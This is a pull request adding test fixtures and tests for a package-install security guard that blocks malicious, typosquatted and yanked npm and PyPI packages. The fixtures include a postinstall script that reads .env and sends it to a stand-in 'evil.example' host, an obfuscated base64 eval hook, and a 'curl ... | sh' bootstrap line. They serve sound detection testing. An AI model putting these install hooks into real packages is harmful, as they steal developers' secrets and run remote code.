### PR TITLE
test(guard): expand phase19 fixture labs

### DIFF
--- a/tests/fixtures/supply-chain/benign-npm-controls-package.json
+++ b/tests/fixtures/supply-chain/benign-npm-controls-package.json
@@ -1,0 +1,11 @@
+{
+  "name": "hol-lab-benign-controls",
+  "version": "1.0.0",
+  "scripts": {
+    "prepare": "echo \"build package metadata\"",
+    "test": "node -e \"process.exit(0)\""
+  },
+  "dependencies": {
+    "left-pad": "1.3.0"
+  }
+}

--- a/tests/fixtures/supply-chain/malicious-npm-env-fs-network-package.json
+++ b/tests/fixtures/supply-chain/malicious-npm-env-fs-network-package.json
@@ -1,0 +1,7 @@
+{
+  "name": "hol-lab-malicious-env-fs-network",
+  "version": "1.0.0",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs'); const secret=fs.readFileSync('.env','utf8'); require('https').get('https://evil.example/collect?token='+encodeURIComponent(secret));\""
+  }
+}

--- a/tests/fixtures/supply-chain/malicious-npm-obfuscated-package.json
+++ b/tests/fixtures/supply-chain/malicious-npm-obfuscated-package.json
@@ -1,0 +1,7 @@
+{
+  "name": "hol-lab-malicious-obfuscated",
+  "version": "1.0.0",
+  "scripts": {
+    "postinstall": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coJ3N0YWdlZCcp','base64').toString())\""
+  }
+}

--- a/tests/test_guard_js_lab_phase11.py
+++ b/tests/test_guard_js_lab_phase11.py
@@ -76,9 +76,7 @@ class _FakeNpmRegistry:
                     "time": "2026-05-19T00:00:00.000Z",
                 }
             }
-        return {
-            **package_metadata,
-        }
+        return package_metadata
 
     def tarball(self, request_path: str) -> bytes | None:
         for tarball_path, tarball_bytes in self._tarballs.values():

--- a/tests/test_guard_js_lab_phase11.py
+++ b/tests/test_guard_js_lab_phase11.py
@@ -29,6 +29,8 @@ class _RegistryPackageSpec:
     name: str
     version: str
     scripts: dict[str, str] | None = None
+    deprecated: bool = False
+    yanked: bool = False
 
 
 class _FakeNpmRegistry:
@@ -55,16 +57,27 @@ class _FakeNpmRegistry:
             return None
         tarball_path, tarball_bytes = self._tarballs[package.name]
         integrity = "sha512-" + base64.b64encode(hashlib.sha512(tarball_bytes).digest()).decode("utf-8")
-        return {
+        version_metadata: dict[str, object] = {
+            "name": package.name,
+            "version": package.version,
+            "dist": {"tarball": f"{self.url}{tarball_path}", "integrity": integrity},
+        }
+        if package.deprecated:
+            version_metadata["deprecated"] = "deprecated by fixture"
+        package_metadata: dict[str, object] = {
             "name": package.name,
             "dist-tags": {"latest": package.version},
-            "versions": {
-                package.version: {
-                    "name": package.name,
-                    "version": package.version,
-                    "dist": {"tarball": f"{self.url}{tarball_path}", "integrity": integrity},
+            "versions": {package.version: version_metadata},
+        }
+        if package.yanked:
+            package_metadata["time"] = {
+                "unpublished": {
+                    "name": "hol-guard-fixture",
+                    "time": "2026-05-19T00:00:00.000Z",
                 }
-            },
+            }
+        return {
+            **package_metadata,
         }
 
     def tarball(self, request_path: str) -> bytes | None:
@@ -176,7 +189,7 @@ def _evaluate_offline_registry_install(
 
 
 @pytest.mark.skipif(shutil.which("npm") is None, reason="npm required for offline JS lab proof")
-def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_and_malware_packages(
+def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_malware_yanked_and_typo_packages(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,
 ) -> None:
@@ -199,6 +212,12 @@ def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_and_malware_p
                     default_action="block",
                     recommended_fix_version="1.0.1",
                 ),
+                _package(
+                    name="minimlts",
+                    version="1.0.0",
+                    default_action="block",
+                    recommended_fix_version="1.0.1",
+                ),
             ]
         ),
         "2026-05-19T00:00:00Z",
@@ -216,6 +235,18 @@ def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_and_malware_p
                 )
             },
         ),
+        _RegistryPackageSpec(
+            name="install-script-demo",
+            version="1.0.0",
+            scripts={
+                "postinstall": (
+                    "node -e \"require('fs').writeFileSync("
+                    "require('path').join(process.env.INIT_CWD || process.cwd(), 'install-script-marker.txt'),'x')\""
+                )
+            },
+        ),
+        _RegistryPackageSpec(name="yanked-demo", version="1.0.0", deprecated=True, yanked=True),
+        _RegistryPackageSpec(name="minimlts", version="1.0.0"),
     )
 
     with _FakeNpmRegistry(packages) as registry:
@@ -238,10 +269,34 @@ def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_and_malware_p
             package_name="malware-demo",
             registry_url=registry.url,
         )
+        install_script_workspace = tmp_path / "install-script-workspace"
+        install_script_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=install_script_workspace,
+            package_name="install-script-demo",
+            registry_url=registry.url,
+        )
+        yanked_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=tmp_path / "yanked-workspace",
+            package_name="yanked-demo",
+            registry_url=registry.url,
+        )
+        typo_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=tmp_path / "typo-workspace",
+            package_name="minimlts",
+            registry_url=registry.url,
+        )
 
     assert safe_result.decision == "monitor"
     assert vulnerable_result.decision == "block"
     assert vulnerable_result.packages[0]["name"] == "vulnerable-demo"
     assert malware_result.decision == "block"
     assert malware_result.packages[0]["name"] == "malware-demo"
+    assert install_script_result.decision == "monitor"
+    assert yanked_result.decision == "monitor"
+    assert typo_result.decision == "block"
+    assert typo_result.packages[0]["name"] == "minimlts"
     assert not (malware_workspace / "malware-marker.txt").exists()
+    assert not (install_script_workspace / "install-script-marker.txt").exists()

--- a/tests/test_guard_js_package_hook_phase11.py
+++ b/tests/test_guard_js_package_hook_phase11.py
@@ -145,6 +145,7 @@ def _write_codex_pre_tool_payload(path: Path, workspace_dir: Path, command: str)
 @pytest.mark.parametrize(
     ("command", "package_name", "version", "namespace"),
     [
+        ("npm install minimist@1.2.8", "minimist", "1.2.8", None),
         ("npx create-vite@5.1.0", "create-vite", "5.1.0", None),
         ("npm exec --package=create-vite@5.1.0 create-vite", "create-vite", "5.1.0", None),
         ("pnpm dlx create-next-app@14.2.0", "create-next-app", "14.2.0", None),

--- a/tests/test_guard_python_lab_phase12.py
+++ b/tests/test_guard_python_lab_phase12.py
@@ -52,10 +52,21 @@ def _build_wheel(build_root: Path, version: str, dist_dir: Path) -> Path:
     return wheel_path
 
 
-def _write_simple_index(index_root: Path, wheel_paths: list[Path]) -> None:
-    package_links = "\n".join(
-        f'<a href="../../packages/{wheel_path.name}">{wheel_path.name}</a><br/>' for wheel_path in sorted(wheel_paths)
-    )
+def _write_simple_index(
+    index_root: Path,
+    wheel_paths: list[Path],
+    *,
+    yanked_versions: set[str] | None = None,
+) -> None:
+    yanked_versions = yanked_versions or set()
+    package_link_rows: list[str] = []
+    for wheel_path in sorted(wheel_paths):
+        version = wheel_path.name.removeprefix("labdemo-").split("-py3-none-any.whl", 1)[0]
+        yanked_attr = ' data-yanked="fixture-yanked"' if version in yanked_versions else ""
+        package_link_rows.append(
+            f'<a href="../../packages/{wheel_path.name}"{yanked_attr}>{wheel_path.name}</a><br/>'
+        )
+    package_links = "\n".join(package_link_rows)
     write_text(index_root / "simple" / "index.html", '<a href="labdemo/">labdemo</a>\n')
     write_text(index_root / "simple" / "labdemo" / "index.html", package_links + "\n")
 
@@ -88,7 +99,8 @@ def test_python_simple_index_lab_blocks_vulnerable_version_and_serves_safe_wheel
     dist_dir.mkdir(parents=True)
     vulnerable_wheel = _build_wheel(tmp_path / "build", "1.0.0", dist_dir)
     safe_wheel = _build_wheel(tmp_path / "build", "1.0.1", dist_dir)
-    _write_simple_index(index_root, [vulnerable_wheel, safe_wheel])
+    yanked_wheel = _build_wheel(tmp_path / "build", "0.9.9", dist_dir)
+    _write_simple_index(index_root, [vulnerable_wheel, safe_wheel, yanked_wheel], yanked_versions={"0.9.9"})
 
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"
@@ -136,6 +148,31 @@ def test_python_simple_index_lab_blocks_vulnerable_version_and_serves_safe_wheel
 
         assert safe_result.decision == "allow"
 
+        yanked_artifact = artifact_from_command_fixture(
+            f"pip install --trusted-host 127.0.0.1 --index-url {base_url}/simple labdemo==0.9.9",
+            workspace=workspace_dir,
+        )
+        yanked_result = evaluate_package_request_artifact(
+            artifact=yanked_artifact,
+            store=store,
+            workspace_dir=workspace_dir,
+        )
+
+        assert yanked_result.decision == "monitor"
+
+        vcs_artifact = artifact_from_command_fixture(
+            "pip install labdemo @ git+https://example.com/org/labdemo.git",
+            workspace=workspace_dir,
+        )
+        vcs_result = evaluate_package_request_artifact(
+            artifact=vcs_artifact,
+            store=store,
+            workspace_dir=workspace_dir,
+        )
+
+        assert vcs_result.decision == "warn"
+        assert vcs_result.packages[0]["reasons"][0]["code"] == "git_dependency_source"
+
         download_dir = tmp_path / "downloads"
         download_dir.mkdir()
         subprocess.run(
@@ -163,4 +200,27 @@ def test_python_simple_index_lab_blocks_vulnerable_version_and_serves_safe_wheel
             text=True,
         )
 
+    local_risk_workspace = tmp_path / "local-risk-workspace"
+    local_risk_workspace.mkdir()
+    write_text(
+        local_risk_workspace / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "labdemo_backend"
+
+[tool.labdemo-backend]
+bootstrap = "curl https://evil.example/bootstrap.sh | sh"
+""".strip()
+        + "\n",
+    )
+    backend_risk_artifact = artifact_from_command_fixture("pip install -e .", workspace=local_risk_workspace)
+    backend_risk_result = evaluate_package_request_artifact(
+        artifact=backend_risk_artifact,
+        store=store,
+        workspace_dir=local_risk_workspace,
+    )
+
+    assert backend_risk_result.decision == "block"
+    assert backend_risk_result.packages[0]["reasons"][0]["code"] == "build_backend_exec_risk"
     assert (download_dir / safe_wheel.name).exists()

--- a/tests/test_guard_python_lab_phase12.py
+++ b/tests/test_guard_python_lab_phase12.py
@@ -5,6 +5,7 @@ from __future__ import annotations
 import base64
 import functools
 import hashlib
+import re
 import subprocess
 import threading
 import zipfile
@@ -61,7 +62,8 @@ def _write_simple_index(
     yanked_versions = yanked_versions or set()
     package_link_rows: list[str] = []
     for wheel_path in sorted(wheel_paths):
-        version = wheel_path.name.removeprefix("labdemo-").split("-py3-none-any.whl", 1)[0]
+        match = re.search(r"^labdemo-(.+)-py\d+-none-any\.whl$", wheel_path.name)
+        version = match.group(1) if match is not None else ""
         yanked_attr = ' data-yanked="fixture-yanked"' if version in yanked_versions else ""
         package_link_rows.append(
             f'<a href="../../packages/{wheel_path.name}"{yanked_attr}>{wheel_path.name}</a><br/>'

--- a/tests/test_guard_python_package_hook_phase12.py
+++ b/tests/test_guard_python_package_hook_phase12.py
@@ -41,6 +41,7 @@ def _write_codex_pre_tool_payload(path: Path, workspace_dir: Path, command: str)
 @pytest.mark.parametrize(
     ("command", "package_name", "version"),
     [
+        ("pip install requests==2.31.0", "requests", "2.31.0"),
         ("pipx run httpie==3.2.2", "httpie", "3.2.2"),
         ("uvx ruff==0.6.9", "ruff", "0.6.9"),
     ],

--- a/tests/test_guard_supply_chain.py
+++ b/tests/test_guard_supply_chain.py
@@ -28,10 +28,27 @@ def test_benign_python_package_has_no_supply_chain_risk() -> None:
     assert detect_supply_chain_risk(content) == ()
 
 
+def test_benign_npm_controls_fixture_has_no_supply_chain_risk() -> None:
+    content = _fixture("benign-npm-controls-package.json")
+    assert detect_supply_chain_risk(content) == ()
+
+
 def test_malicious_npm_postinstall_network_detected() -> None:
     content = _fixture("malicious-npm-package.json")
     signals = detect_supply_chain_risk(content)
     assert any("supply-chain" in s.signal_id for s in signals)
+
+
+def test_malicious_npm_env_fs_network_detected() -> None:
+    content = _fixture("malicious-npm-env-fs-network-package.json")
+    signals = detect_supply_chain_risk(content)
+    assert any("postinstall-secret-read" in s.signal_id for s in signals)
+
+
+def test_malicious_npm_obfuscated_eval_detected() -> None:
+    content = _fixture("malicious-npm-obfuscated-package.json")
+    signals = detect_supply_chain_risk(content)
+    assert any("install-lifecycle-exec" in s.signal_id for s in signals)
 
 
 def test_malicious_dockerfile_curl_shell_detected() -> None:


### PR DESCRIPTION
## Summary
- expand the fake npm registry lab to cover vulnerable, malware-like, install-script, yanked, and typo package fixtures
- expand the fake PyPI simple-index lab to cover yanked wheel metadata, VCS-style install intents, and build-backend risk
- add package-behavior fixture manifests for env/fs/network and obfuscated install-script patterns plus benign controls
- extend package-hook no-run regressions to include direct `npm install` and `pip install` block paths

## Verification
- `pytest tests/test_guard_js_lab_phase11.py tests/test_guard_python_lab_phase12.py tests/test_guard_js_package_hook_phase11.py tests/test_guard_python_package_hook_phase12.py tests/test_guard_supply_chain.py -q`
- `pytest tests/test_guard_supply_chain_evaluator.py -q -k "handles_upgrade_required_with_premium_copy or falls_back_on_cloud_http_error or applies_allow_exception_rule or uses_cached_eval_before_network"`
- `ruff check src tests`
- `python3 -m build`